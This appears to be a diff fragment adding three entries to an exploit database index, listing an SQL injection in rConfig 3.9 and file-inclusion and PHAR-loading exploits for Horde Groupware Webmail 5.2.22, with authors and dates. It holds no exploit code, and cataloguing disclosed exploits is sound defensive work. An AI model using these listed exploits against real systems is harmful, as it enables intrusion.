+48208,exploits/php/webapps/48208.py,"rConfig 3.9 - 'searchColumn' SQL Injection",2020-03-12,vikingfr,webapps,php,
+48209,exploits/php/webapps/48209.py,"Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion",2020-03-11,"Andrea Cardaci",webapps,php,
+48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php,